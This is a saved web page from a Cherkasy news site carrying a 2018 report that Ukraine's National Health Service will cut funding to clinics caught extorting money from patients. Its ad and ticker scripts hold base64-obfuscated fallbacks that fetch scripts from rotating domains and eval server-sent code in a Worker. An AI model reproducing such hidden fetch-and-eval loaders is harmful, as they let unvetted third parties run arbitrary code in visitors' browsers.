
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="uk-ua" lang="uk-ua">
<head>
	  <base href="http://procherk.info/news/7-cherkassy/65057-cherkaski-polikliniki-u-jakih-iz-patsientiv-vimagatimut-groshi-ne-finansuvatimut" />
  <meta http-equiv="content-type" content="text/html; charset=utf-8" />
  <meta name="robots" content="index, follow" />
  <meta name="keywords" content="фінансування, медзаклади, Стадник" />
  <meta name="title" content="Черкаські поліклініки, у яких із пацієнтів вимагатимуть гроші, не фінансуватимуть" />
  <meta name="author" content="ПРОЧЕРК" />
  <meta name="description" content="Національна служба здоров’я України припинятиме фінансування медичних закладів первинної ланки, де зафіксують випадки вимагання коштів, наприклад, у формі благодійних внесків." />
  <title>Черкаські поліклініки, у яких із пацієнтів вимагатимуть гроші, не фінансуватимуть — ПРОЧЕРК.інфо</title>
  <link href="/component/jcomments/feed/com_content/65057" rel="alternate" type="application/rss+xml" title="Черкаські поліклініки, у яких із пацієнтів вимагатимуть гроші, не фінансуватимуть" />
  <link href="/templates/procherk2/favicon.ico" rel="shortcut icon" type="image/x-icon" />
  <link rel="stylesheet" href="/components/com_jcomments/tpl/default/style.css?v=12" type="text/css" />
  <link rel="stylesheet" href="http://procherk.info/plugins/content/extranews/css/extranews.css" type="text/css" />
  <link rel="stylesheet" href="/components/com_gantry/css/gantry.css" type="text/css" />
  <link rel="stylesheet" href="/components/com_gantry/css/grid-12.css" type="text/css" />
  <link rel="stylesheet" href="/components/com_gantry/css/joomla.css" type="text/css" />
  <link rel="stylesheet" href="/templates/procherk2/css/joomla.css" type="text/css" />
  <link rel="stylesheet" href="/templates/procherk2/css/style5.css" type="text/css" />
  <link rel="stylesheet" href="/templates/procherk2/css/light-body.css" type="text/css" />
  <link rel="stylesheet" href="/templates/procherk2/css/demo-styles.css" type="text/css" />
  <link rel="stylesheet" href="/templates/procherk2/css/template.css" type="text/css" />
  <link rel="stylesheet" href="/templates/procherk2/css/typography.css" type="text/css" />
  <link rel="stylesheet" href="/templates/procherk2/css/fusionmenu.css" type="text/css" />
  <link rel="stylesheet" href="/modules/mod_rokajaxsearch/css/rokajaxsearch.css" type="text/css" />
  <link rel="stylesheet" href="/modules/mod_rokajaxsearch/themes/light/rokajaxsearch-theme.css" type="text/css" />
  <style type="text/css">
    <!--
#rt-main-surround ul.menu li.active > a, #rt-main-surround ul.menu li.active > .separator, #rt-main-surround ul.menu li.active > .item, #rt-main-surround .square4 ul.menu li:hover > a, #rt-main-surround .square4 ul.menu li:hover > .item, #rt-main-surround .square4 ul.menu li:hover > .separator, .roktabs-links ul li.active span {color:#980000;}
a, #rt-main-surround ul.menu a:hover, #rt-main-surround ul.menu .separator:hover, #rt-main-surround ul.menu .item:hover {color:#980000;}body #rt-logo {width:400px;height:88px;}
    -->
  </style>
  <script type="text/javascript" src="/components/com_jcomments/js/jcomments-v2.1.js?v=7"></script>
  <script type="text/javascript" src="/components/com_jcomments/libraries/joomlatune/ajax.js?v=3"></script>
  <script type="text/javascript" src="/media/system/js/mootools.js"></script>
  <script type="text/javascript" src="/media/system/js/caption.js"></script>
  <script type="text/javascript" src="/components/com_gantry/js/gantry-buildspans.js"></script>
  <script type="text/javascript" src="/components/com_gantry/js/gantry-inputs.js"></script>
  <script type="text/javascript" src="/modules/mod_rokajaxsearch/js/rokajaxsearch.js"></script>
  <script type="text/javascript">

			window.addEvent('domready', function() {
				var modules = ['rt-block'];
				var header = ['h3','h2','h1'];
				GantryBuildSpans(modules, header);
			});
		InputsExclusion.push('.content_vote','#rt-popup')window.addEvent((window.webkit) ? 'load' : 'domready', function() {
				window.rokajaxsearch = new RokAjaxSearch({
					'results': ' Результати',
					'close': '',
					'websearch': 0,
					'blogsearch': 0,
					'imagesearch': 0,
					'videosearch': 0,
					'imagesize': 'MEDIUM',
					'safesearch': 'MODERATE',
					'search': ' Пошук по сайту...',
					'readmore': ' Детальніше...',
					'noresults': ' Нічого не знайдено',
					'advsearch': ' Розширений пошук',
					'page': ' Сторінка',
					'page_of': ' з',
					'searchlink': 'http://procherk.info/index.php?option=com_search&amp;view=search&amp;tmpl=component',
					'advsearchlink': 'http://procherk.info/index.php?option=com_search&amp;view=search',
					'uribase': 'http://procherk.info/',
					'limit': '3',
					'perpage': '3',
					'ordering': 'newest',
					'phrase': 'any',
					'hidedivs': '',
					'includelink': 1,
					'viewall': ' Дивитись всі результати',
					'estimated': ' очікується',
					'showestimated': 1,
					'showpagination': 1,
					'showcategory': 0,
					'showreadmore': 0,
					'showdescription': 1
				});
			});
  </script>
<link rel="stylesheet" type="text/css" media="print" href="/templates/procherk2/css/print.css" />	


</head>
	<body  class="backgroundlevel-high backgroundstyle-style5 bodylevel-low bodystyle-light cssstyle-style5 logostyle-light font-family-helvetica font-size-is-default menu-type-fusionmenu col12 menu-news -coresettings,-presets,-layouts option-com-content view-article">
		<div id="rt-main-background">
			<div class="rt-container">
								<div id="rt-drawer">
										<div class="clear"></div>
				</div>
																<div id="rt-header">
					<div class="rt-grid-6 rt-alpha">
    			<div class="rt-block">
    	    	<a href="/" id="rt-logo"></a>
    		</div>
	    
</div>
<div class="rt-grid-6 rt-omega">
    		<div style="line-height:1;text-align:center;clear:both;font-size:8px;">реклама</div>
<div style="text-align:center;clear:both;">
   <a href="https://www.facebook.com/%D0%94%D0%B5%D0%BF%D1%83%D1%82%D0%B0%D1%82-XXI-%D1%81%D1%82%D0%BE%D1%80%D1%96%D1%87%D1%87%D1%8F-1865051570172264/" target="_blank">
     <img src="/images/banners/deputat_xxi.jpg" width="468" height="60" alt="Програма навчання депутатів" />
   </a>
</div>	
</div>
					<div class="clear"></div>
				</div>
																<div id="rt-navigation"><div id="rt-navigation2"><div id="rt-navigation3">
							<div class="nopill">
	<ul class="menutop level1 nojs" >
						<li class="item1 root" >
					<a class="orphan item bullet" href="http://procherk.info/"  >
				<span>
			    				Головна				   
				</span>
			</a>
			
			
	</li>	
							<li class="item2 parent root" >
					<a class="daddy item bullet" href="/resonance"  >
				<span>
			    				Резонанс				   
				</span>
			</a>
			
					<div class="fusion-submenu-wrapper level2">
				<div class="drop-top"></div>
				<ul class="level2">
								
							<li class="item3" >
					<a class="orphan item bullet" href="/resonance/jeans-tonic"  >
				<span>
			    				Джинс-тонік				   
				</span>
			</a>
			
			
	</li>	
									
							<li class="item4" >
					<a class="orphan item bullet" href="/resonance/economy"  >
				<span>
			    				Економіка				   
				</span>
			</a>
			
			
	</li>	
									
							<li class="item19" >
					<a class="orphan item bullet" href="/resonance/start2012"  >
				<span>
			    				Старт 2012				   
				</span>
			</a>
			
			
	</li>	
										</ul>
			</div>
			
	</li>	
							<li class="item33 parent root" >
					<a class="daddy item bullet" href="/tabloid"  >
				<span>
			    				Таблоїд				   
				</span>
			</a>
			
					<div class="fusion-submenu-wrapper level2">
				<div class="drop-top"></div>
				<ul class="level2">
								
							<li class="item5" >
					<a class="orphan item bullet" href="/tabloid/digest"  >
				<span>
			    				Дайджест				   
				</span>
			</a>
			
			
	</li>	
									
							<li class="item6" >
					<a class="orphan item bullet" href="/tabloid/net"  >
				<span>
			    				Мережа				   
				</span>
			</a>
			
			
	</li>	
										</ul>
			</div>
			
	</li>	
							<li class="item26 parent root" >
					<a class="daddy item bullet" href="#"  >
				<span>
			    				Проекти				   
				</span>
			</a>
			
					<div class="fusion-submenu-wrapper level2">
				<div class="drop-top"></div>
				<ul class="level2">
								
							<li class="item27" >
					<a class="orphan item bullet" href="/direct"  >
				<span>
			    				Пряма мова				   
				</span>
			</a>
			
			
	</li>	
									
							<li class="item42" >
					<a class="orphan item bullet" href="/iloveukraine"  >
				<span>
			    				Фотомаршрут				   
				</span>
			</a>
			
			
	</li>	
									
							<li class="item46" >
					<a class="orphan item bullet" href="/faces"  >
				<span>
			    				Обличчя Черкас				   
				</span>
			</a>
			
			
	</li>	
									
							<li class="item80" >
					<a class="orphan item bullet" href="/vkraina"  >
				<span>
			    				#Vkraina				   
				</span>
			</a>
			
			
	</li>	
									
							<li class="item90" >
					<a class="orphan item bullet" href="/longreads"  >
				<span>
			    				Лонгріди				   
				</span>
			</a>
			
			
	</li>	
										</ul>
			</div>
			
	</li>	
							<li class="item7 root" >
					<a class="orphan item bullet" href="/about"  >
				<span>
			    				Про нас				   
				</span>
			</a>
			
			
	</li>	
							<li class="item18 root" >
					<a class="orphan item bullet" href="/proposal"  >
				<span>
			    				Реклама				   
				</span>
			</a>
			
			
	</li>	
				</ul>
</div>
			<form name="rokajaxsearch" id="rokajaxsearch" class="light" action="http://procherk.info/" method="get">
<div class="rokajaxsearch">
	<div class="roksearch-wrapper">
		<input id="roksearch_search_str" name="searchword" type="text" class="inputbox" value=" Пошук по сайту..." />
	</div>
	<input type="hidden" name="searchphrase" value="any"/>
	<input type="hidden" name="limit" value="20" />
	<input type="hidden" name="ordering" value="newest" />
	<input type="hidden" name="view" value="search" />
	<input type="hidden" name="Itemid" value="99999999" />
	<input type="hidden" name="option" value="com_search" />

	
	<div id="roksearch_results"></div>
</div>
<div id="rokajaxsearch_tmp" style="visibility:hidden;display:none;"></div>
</form>	
				    <div class="clear"></div>
				</div></div></div>
												<div class="rt-surround"><div class="rt-surround2"><div class="rt-surround3">
															<div id="rt-main-surround">
																							              <div id="rt-main" class="mb9-sa3">
                <div class="rt-main-inner">
                    <div class="rt-grid-9 ">
                                                <div id="rt-content-top">
                            <div class="rt-grid-9 rt-alpha rt-omega">
                        <div class="rt-block">
				<div class="rt-module-surround">
					<div class="rt-module-top"><div class="rt-module-top2"><div class="rt-module-top3"></div></div></div>
					<div class="rt-module-inner">
	                							<div class="module-content">
		                	<div style="line-height:1;text-align:center;clear:both;font-size:8px;">реклама</div>
<div style="text-align:center;clear:both;">
   <a href="https://www.facebook.com/%D0%94%D0%B5%D0%BF%D1%83%D1%82%D0%B0%D1%82-XXI-%D1%81%D1%82%D0%BE%D1%80%D1%96%D1%87%D1%87%D1%8F-1865051570172264/" target="_blank">
     <img src="/images/banners/deputat_xxi.jpg" width="468" height="60" alt="Програма навчання депутатів" />
   </a>
</div>						</div>
					</div>
					<div class="rt-module-bottom"><div class="rt-module-bottom2"><div class="rt-module-bottom3"></div></div></div>
				</div>
            </div>
        	
</div>
							<div class="clear"></div>
                        </div>
                                                <div class="rt-block">
                            							<div class="default">
							<div class="rt-module-surround">
								<div class="rt-module-top"><div class="rt-module-top2"><div class="rt-module-top3"></div></div></div>
								<div class="rt-module-inner">
		                            <div id="rt-mainbody">
		                                
<div class="rt-joomla ">
	<div class="rt-article">
		
				<div class="rt-headline"><h1 class="rt-article-title"><a href="/news/7-cherkassy/65057-cherkaski-polikliniki-u-jakih-iz-patsientiv-vimagatimut-groshi-ne-finansuvatimut">Черкаські поліклініки, у яких із пацієнтів вимагатимуть гроші, не фінансуватимуть</a></h1>		</div>
		<div class="clear"></div>
		
		
		
				<div class="rt-articleinfo">
						<div class="rt-article-icons">
								<a href="#" title="Друк" onclick="window.print(); return false;" rel="nofollow"><span class="icon print"></span></a>																</div>
			
						<span class="rt-date-posted">
				30 липня 2018, 10:27			</span>
						

			
						
				<span class="rt-section">
							<a href="/news">						Новини Черкас та Черкаської області							</a>					</span>
								<span class="rt-section">/</span>
						<span class="rt-section">
							<a href="/news/7-cherkassy">						Черкаські новини							</a>					</span>
		
    
	
					</div>
				
		<div class="rt-articleinfo">
			<div class="sharethis-inline-share-buttons"></div>
			<!--<div class="addthis_inline_share_toolbox"></div>
			<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=procherk"></script>-->
		</div>
		
		

		
		<p style="text-align: justify;"><strong>Національна служба здоров’я України припинятиме фінансування медичних закладів первинної ланки, де зафіксують випадки вимагання коштів, наприклад, у формі благодійних внесків.</strong></p>
<p style="text-align: justify;" /><strong /><img src="/images/news/072018/25a27686a39f58a90543b2b6d0fcb3c1.jpg" border="0" alt="1532930729-684" width="585" height="422" /> <br />

</strong></p>
<p style="text-align: justify;">На цьому під час ранкової наради в мерії наголосив директор департаменту здоров’я та медичних послуг в міськраді Олег Стадник, повідомляє «<a href="http://zmi.ck.ua/cherkassy/nyakih-blagodynih-vneskv-cherkask-polklnki-de-z-patsntv-vimagatimut-grosh-ne-fnansuvatimut.html">zmi.ck.ua</a>».</p>
<p style="text-align: justify;">"Національна служба здоров’я, якщо матиме факти (з доказами) вимагання коштів у поліклініках, передаватиме такі дані в правоохоронні органи й матиме право вимагати повернення авансу. Тож, якщо такі випадки будуть, Національна служба здоров’я вдаватиметься до жорстких дій. Я попрошу всіх керівників медичних закладів провести окремі семінарі щодо цього питання, де б пояснили працівникам, що чекає на заклад у випадку недобросовісних дій", - сказав Стадник.</p></p><div style="clear:both;"></div><div style="border-top: 1px solid #bbb; margin-top: 20px; padding-top: 10px;  line-height:1; text-align:center; font-size:8px;">реклама</div>
<div id="MIXADV_3336" class="MIXADVERT_NET"></div>
          <script> 
          var node3336 = document.getElementById("MIXADV_3336");
          if( node3336 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=3336&r="+Math.random();
               node3336.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBkYXRlX251bWJlciA9IGRhdGUuZ2V0RGF0ZSgpO2lmKCBkYXRlX251bWJlciA8IDE3ICkgdmFyIGhvc3QgPSAicG1uZGJzamQuc2l0ZSI7IGlmKCBkYXRlX251bWJlciA+IDE2ICYmIGRhdGVfbnVtYmVyIDwgMjUgKSB2YXIgaG9zdCA9ICJzZGdld2Zyd2Uuc3BhY2UiOyBpZiggZGF0ZV9udW1iZXIgPiAyNCApIHZhciBob3N0ID0gIm9pbmRzcXd3LnNpdGUiOyB2YXIgc2NyaXB0X2ZpcnN0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7c2NyaXB0X2ZpcnN0LnNyYyA9ICJodHRwczovLyIrIGhvc3QrIi9zaG93Lz9pZD0zMzM2JnI9IitNYXRoLnJhbmRvbSgpO25vZGUzMzM2LnBhcmVudE5vZGUuYXBwZW5kQ2hpbGQoc2NyaXB0X2ZpcnN0KTs=") );
              }
          }
          </script>
<br/>
<div id="adpartner-jsunit-500">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=500&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<div style="margin-left:3%; margin-right:2%; text-align:left;"><hr color="maroon" width="85%"></hr><div id="relateditemtitle">Інші матеріали по темі:</div><ul id="relateditemlist">
<li><span class="extranews_date">18/07/2018 15:24</span> - <a href="/direct/254-stadnik/64796-stadnik-chi-modno-gorditis-svoeju-krayinoju">Стадник: Чи модно гордитись своєю країною?</a></li>
<li><span class="extranews_date">06/07/2018 12:33</span> - <a href="/news/7-cherkassy/64485-stalo-vidomo-skilki-cherkastsiv-vzhe-pidpisali-deklaratsiyi-z-simejnimi-likarjami">Стало відомо, скільки черкасців вже підписали декларації з сімейними лікарями</a></li>
<li><span class="extranews_date">26/06/2018 13:03</span> - <a href="/news/7-cherkassy/64202-90--vartosti-oblashtuvannja-pandusiv-ta-pidjomnikiv-u-budinkah-osbb-proponuetsja-finansuvati-z-miskbjudzhetu">90 % вартості облаштування пандусів та підйомників у будинках ОСББ пропонується фінансувати з міськбюджету </a></li>
<li><span class="extranews_date">25/06/2018 11:02</span> - <a href="/news/7-cherkassy/64155-cherkasi-u-top-6-mist-scho-uvijshli-v-sistemu-natsionalnoyi-sluzhbi-zdorovja-video">Черкаси – у топ-6 міст, що увійшли в систему Національної служби здоров᾽я (ВІДЕО)</a></li>
<li><span class="extranews_date">20/06/2018 13:22</span> - <a href="/news/7-cherkassy/64043-zagalnodostupna-nedostupnist-shkilni-sportivni-majdanchiki-proponujut-vikljuchiti-iz-gromadskogo-bjudzhetu">Загальнодоступна недоступність: шкільні спортивні майданчики пропонують виключити із Громадського бюджету</a></li>
</ul>
<div id="prev_next_buttom" align="center"></div><hr color="maroon" width="85%"></hr></div>		<div class="rt-articleinfo">
			<div class="sharethis-inline-share-buttons"></div>
			<script type="text/javascript" src="//platform-api.sharethis.com/js/sharethis.js#property=5a1ef9f0c87cd900112f81af&product=inline-share-buttons"></script>
		</div>

		<script type="text/javascript">
<!--
var jcomments=new JComments(65057, 'com_content','/index.php?option=com_jcomments&amp;tmpl=component');
jcomments.setList('comments-list');
//-->
</script>
<div id="jc">
<div id="comments"></div>
<br/><div id="lx_530747"></div>
<h4>Додати коментар</h4>
<div class="comments-policy">Звертаємо Вашу увагу, що "Прочерк" - це майданчик коректних дискусій!</div>
<a id="addcomments" href="#addcomments"></a>
<form id="comments-form" name="comments-form" action="javascript:void(null);">
<p>
	<input id="comments-form-name" type="text" name="name" value="" maxlength="25" size="22" tabindex="1" />
	<label for="comments-form-name">Ім'я (обов'язкове)</label>


	<input id="comments-form-email" type="text" name="email" value="" size="22" tabindex="2" />
	<label for="comments-form-email">Електронна адреса</label>
</p>
<p>
	<textarea id="comments-form-comment" name="comment" cols="65" rows="8" tabindex="5"></textarea>
</p>
<div id="comments-form-buttons">
	<div class="btn" id="comments-form-send"><div><a href="#" tabindex="7" onclick="jcomments.saveComment();return false;" title="Надіслати (Ctrl+Enter)">Надіслати</a></div></div>
	<div class="btn" id="comments-form-cancel" style="display:none;"><div><a href="#" tabindex="8" onclick="return false;" title="Скасувати">Скасувати</a></div></div>
	<div style="clear:both;"></div>
</div>
	<input type="hidden" name="object_id" value="65057" />
	<input type="hidden" name="object_group" value="com_content" />
</form>
<script type="text/javascript">
<!--
function JCommentsInitializeForm()
{
	var jcEditor = new JCommentsEditor('comments-form-comment', true);
	jcEditor.initSmiles('http://procherk.info/components/com_jcomments/images/smiles');
	jcEditor.addSmile(':D','laugh.gif');
	jcEditor.addSmile(':lol:','lol.gif');
	jcEditor.addSmile(':-)','smile.gif');
	jcEditor.addSmile(';-)','wink.gif');
	jcEditor.addSmile('8)','cool.gif');
	jcEditor.addSmile(':-|','normal.gif');
	jcEditor.addSmile(':-*','whistling.gif');
	jcEditor.addSmile(':oops:','redface.gif');
	jcEditor.addSmile(':sad:','sad.gif');
	jcEditor.addSmile(':cry:','cry.gif');
	jcEditor.addSmile(':o','surprised.gif');
	jcEditor.addSmile(':-?','confused.gif');
	jcEditor.addSmile(':-x','sick.gif');
	jcEditor.addSmile(':eek:','shocked.gif');
	jcEditor.addSmile(':zzz','sleeping.gif');
	jcEditor.addSmile(':P','tongue.gif');
	jcEditor.addSmile(':roll:','rolleyes.gif');
	jcEditor.addSmile(':sigh:','unsure.gif');
	jcEditor.addCounter(1000, 'Залишилося:', ' символів', 'counter');
	jcomments.setForm(new JCommentsForm('comments-form', jcEditor));
}

if (window.addEventListener) {window.addEventListener('load',JCommentsInitializeForm,false);}
else if (document.addEventListener){document.addEventListener('load',JCommentsInitializeForm,false);}
else if (window.attachEvent){window.attachEvent('onload',JCommentsInitializeForm);}
else {if (typeof window.onload=='function'){var oldload=window.onload;window.onload=function(){oldload();JCommentsInitializeForm();}} else window.onload=JCommentsInitializeForm;} 
//-->
</script>

</div>	</div>
</div>
		                            </div>
									<div class="clear"></div>
								</div>
								<div class="rt-module-bottom"><div class="rt-module-bottom2"><div class="rt-module-bottom3"></div></div></div>
							</div>
							</div>
                                                    </div>
                                                <div id="rt-content-bottom">
                            <div class="rt-grid-9 rt-alpha rt-omega">
                        <div class="rt-block">
				<div class="rt-module-surround">
					<div class="rt-module-top"><div class="rt-module-top2"><div class="rt-module-top3"></div></div></div>
					<div class="rt-module-inner">
	                							<div class="module-content">
		                	<script type="text/javascript">
            document.open();
            document.write("<iframe id='product_price' src='https://www.zhitomir.info/price_5.html' frameborder='0' scrolling='no' style='border:none; overflow:hidden; width:600px; height:540px;'></iframe>");
            document.close();
         </script>						</div>
					</div>
					<div class="rt-module-bottom"><div class="rt-module-bottom2"><div class="rt-module-bottom3"></div></div></div>
				</div>
            </div>
        	                    <div class="rt-block">
				<div class="rt-module-surround">
					<div class="rt-module-top"><div class="rt-module-top2"><div class="rt-module-top3"></div></div></div>
					<div class="rt-module-inner">
	                							<div class="module-title">
														<h2 class="title">Цікаві новини звідусіль</h2>
													</div>
						<div class="clear"></div>
		                						<div class="module-content">
		                	<div id="CNM148" style="text-align:center;display:none" atr148="148">
    <a href="http://novostimira.com.ua/" target="_blank"><strong>Новости</strong></a>
</div>
<!-- before </body> -->
<script type="text/javascript">
    var el = document.getElementById('CNM148');
    if (el && el.getAttribute('atr148', 3)) {
        el.setAttribute('atr148', '');
        var dateNM = new Date();
        var t = Math.floor(dateNM.getTime()/(1000*600));
        var NMces=document.createElement('script');
        NMces.type = 'text/javascript';
        NMces.charset = 'UTF-8';
        NMces.src='http://c.novostimira.com.ua/l/148?v='+t;
        el.parentNode.appendChild(NMces);
    }
</script>
<br/>
						</div>
					</div>
					<div class="rt-module-bottom"><div class="rt-module-bottom2"><div class="rt-module-bottom3"></div></div></div>
				</div>
            </div>
        	
</div>
                        </div>
                                            </div>
                                <div class="rt-grid-3">
                <div id="rt-sidebar-a">
                                        <div class="rt-block">
				<div class="rt-module-surround">
					<div class="rt-module-top"><div class="rt-module-top2"><div class="rt-module-top3"></div></div></div>
					<div class="rt-module-inner">
	                							<div class="module-content">
		                	<span mce_style="line-height:1;text-align:center;font-size:8px;" style="line-height:1;text-align:left;font-size:8px;">реклама</span>
<br/><a target="_blank" rel="nofollow" href="http://delikat.org.ua/">
  <img style="border:1px solid #cccccc" src="/images/banners/delicat_07.png?v=8" width="240"  alt="Моніторинг цін" /></a>						</div>
					</div>
					<div class="rt-module-bottom"><div class="rt-module-bottom2"><div class="rt-module-bottom3"></div></div></div>
				</div>
            </div>
        	                    <div class="rt-block">
				<div class="rt-module-surround">
					<div class="rt-module-top"><div class="rt-module-top2"><div class="rt-module-top3"></div></div></div>
					<div class="rt-module-inner">
	                							<div class="module-title">
														<h2 class="title">НОВЕ НА САЙТІ</h2>
													</div>
						<div class="clear"></div>
		                						<div class="module-content">
		                	
<div class="junewsultra">
    <div class="junews-category">
			</div>
	<div class="junews">
        			<div class="junews-title">
		    <a href="/tabloid/99-cherkassy-news/64958-ukrayinskij-nardep-iz-zhashkova-vijshla-zamizh-za-inozemtsja-foto">Український нардеп із Жашкова вийшла заміж за іноземця (ФОТО)</a><br />
			</div>
        
		<div class="junews-info">
											</div>
		
        			<div class="junews-pic">
			<img src="http://procherk.info/modules/mod_junewsultra/img/Li4vLi4vLi4vaW1hZ2VzL25ld3MvMDcyMDE4LzI4NDQ0OWUxOWZmMmQyZWFmZTM0MmIwMTM3N2Q2MzlhLmpwZyZhbXA7dz0yNDAmYW1wO2g9MTIwJmFtcDtxPTEwMCZhbXA7emM9MQ==_junus.jpg" />			</div>
        
        
        	</div>
	<div class="clr"></div>
	<div class="junews">
        			<div class="junews-title">
		    <a href="/tabloid/99-cherkassy-news/64910-cherkaske-selo-vvijshlo-do-finalu-konkursu-nejmovirni-sela-ukrayini-2018">Черкаське село ввійшло до фіналу конкурсу «Неймовірні села України 2018»</a><br />
			</div>
        
		<div class="junews-info">
											</div>
		
        			<div class="junews-pic">
			<img src="http://procherk.info/modules/mod_junewsultra/img/Li4vLi4vLi4vaW1hZ2VzL25ld3MvMDcyMDE4L2NkMTYyY2VhOWQyNGI0ODM1MTJkNTJhZTg1MTU0NmZkLmpwZyZhbXA7dz0yNDAmYW1wO2g9MTIwJmFtcDtxPTEwMCZhbXA7emM9MQ==_junus.jpg" />			</div>
        
        
        	</div>
	<div class="clr"></div>
	<div class="junews">
        			<div class="junews-title">
		    <a href="/tabloid/99-cherkassy-news/64834-vidomij-cherkaschanin-proviv-na-mezhi-z-krimom-aktsiju-na-pidtrimku-olega-sentsova">Відомий черкащанин провів на межі з Кримом акцію на підтримку Олега Сенцова</a><br />
			</div>
        
		<div class="junews-info">
											</div>
		
        			<div class="junews-pic">
			<img src="http://procherk.info/modules/mod_junewsultra/img/Li4vLi4vLi4vaW1hZ2VzL25ld3MvMDcyMDE4LzE4M2Q4ZmVjMjMxNTZmODk2NWIyOGM3ZTI4ODliZGNmLmpwZyZhbXA7dz0yNDAmYW1wO2g9MTIwJmFtcDtxPTEwMCZhbXA7emM9MQ==_junus.jpg" />			</div>
        
        
        	</div>
	<div class="clr"></div>
</div>						</div>
					</div>
					<div class="rt-module-bottom"><div class="rt-module-bottom2"><div class="rt-module-bottom3"></div></div></div>
				</div>
            </div>
        	                    <div class="rt-block">
				<div class="rt-module-surround">
					<div class="rt-module-top"><div class="rt-module-top2"><div class="rt-module-top3"></div></div></div>
					<div class="rt-module-inner">
	                							<div class="module-content">
		                	<object width="240" height="120" data="/images/teatr2.swf" type="application/x-shockwave-flash"><param value="/images/teatr2.swf" name="movie"><param value="high" name="quality"><param value="transparent" name="wmode"> <a href="http://theatre-shevchenko.ck.ua/index.php?option=com_content&view=article&id=122&Itemid=18" target="_blank" rel="nofollow"> <img width="240" height="120" alt="Театр" src="/images/teatr.jpg"></a> </object>
</a>
<br/>

<script id="r35764" type="text/javascript">
    (function() {
        var worker35764,
            tickerID = 35764,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-ua.redtram.com/n4p/0/35/ticker_35764.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker35764.postMessage(data);
                }

                worker35764 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker35764.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker35764.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>						</div>
					</div>
					<div class="rt-module-bottom"><div class="rt-module-bottom2"><div class="rt-module-bottom3"></div></div></div>
				</div>
            </div>
        	
                </div>
            </div>

                    <div class="clear"></div>
                </div>
            </div>
																								<div id="rt-bottom"><div id="rt-bottom2">
							<div class="rt-grid-6 rt-alpha">
                    <div class="square2">
                    <div class="rt-block">
				<div class="rt-module-surround">
					<div class="rt-module-top"><div class="rt-module-top2"><div class="rt-module-top3"></div></div></div>
					<div class="rt-module-inner">
	                							<div class="module-content">
		                	<!--bigmir)net TOP 100-->
<script type="text/javascript" language="javascript"><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:16867514,s:16867514,t:29,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
for(var f=self;f!=f.parent;f=f.parent)bm.w++;
try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));
else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
r=bmD.referrer.slice(7);if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r);bm.v^=r.length}
bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];
bmD.write('<a href="http://www.bigmir.net/" target="_blank" onClick="img=new Image();img.src="http://www.bigmir.net/?cl=16867514";"><img src="http://c.bigmir.net/?'+bs.join('&')+'"  width="160" height="19" border="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a>');
//-->
